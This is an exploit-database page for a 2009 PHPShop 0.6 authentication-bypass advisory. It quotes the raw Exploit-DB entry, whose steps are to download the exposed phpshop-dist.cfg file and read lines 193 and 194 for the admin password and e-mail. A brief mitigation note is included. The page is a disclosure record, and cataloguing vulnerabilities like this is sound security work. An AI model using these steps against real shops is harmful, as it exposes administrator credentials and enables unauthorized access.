header-logo
Suggest Exploit
vendor:
PHPShop
by:
indoushka
7.5
CVSS
HIGH
Bypass Config
287
CWE
Product Name: PHPShop
Affected Version From: 0.6
Affected Version To: 0.6
Patch Exists: NO
Related CWE: N/A
CPE: a:phpshop:phpshop:0.6
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows SP2, Lunix 9.4 Ubuntu
2009

PHPShop Version 0.6 by pass Vulnerability

The vulnerability allows an attacker to bypass the authentication of the PHPShop Version 0.6 application by downloading the phpshop-dist.cfg file and accessing the login credentials in lines 193 and 194.

Mitigation:

Ensure that the phpshop-dist.cfg file is not accessible to unauthorized users.
Source

Exploit-DB raw data:

========================================================================================
| # Title    : PHPShop Version 0.6 by pass Vulnerability                               |
| # Author   : indoushka                                                               |
| # email    : indoushka@hotmail.com                                                   |
| # Home     : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860)       |
| # EDB-ID   : 10677                                                                   |
| # CVE-ID   : ()                                                                      |
| # OSVDB-ID : ()                                                                      |
| # DAte     :16/12/2009                                                               |
| # Verified :                                                                         |
| # Web Site : www.iq-ty.com                                                           |
| # Published:                                                                         |
| # Script   : PHPShop Version 0.6                                                     |
| # Tested on: windows SP2 Fran�ais V.(Pnx2 2.0) + Lunix Fran�ais v.(9.4 Ubuntu)       |
| # Bug      : by Pass Config                                                          |
======================      Exploit By indoushka       =================================
| # Exploit  :
|
| 1- http://localhost/phpshop/etc/phpshop-dist.cfg * After download
| 2- open it and loock in lin: 193+194 you find the pass and e-mail to login
|
================================   Dz-Ghost Team   ========================================
Greetz : all my friend * Dos-Dz * Snakespc * His0k4 * Hussin-X * Str0ke * Saoucha * Star08 |
-------------------------------------------------------------------------------------------

Navigation

Suggest Exploit

Services By CQR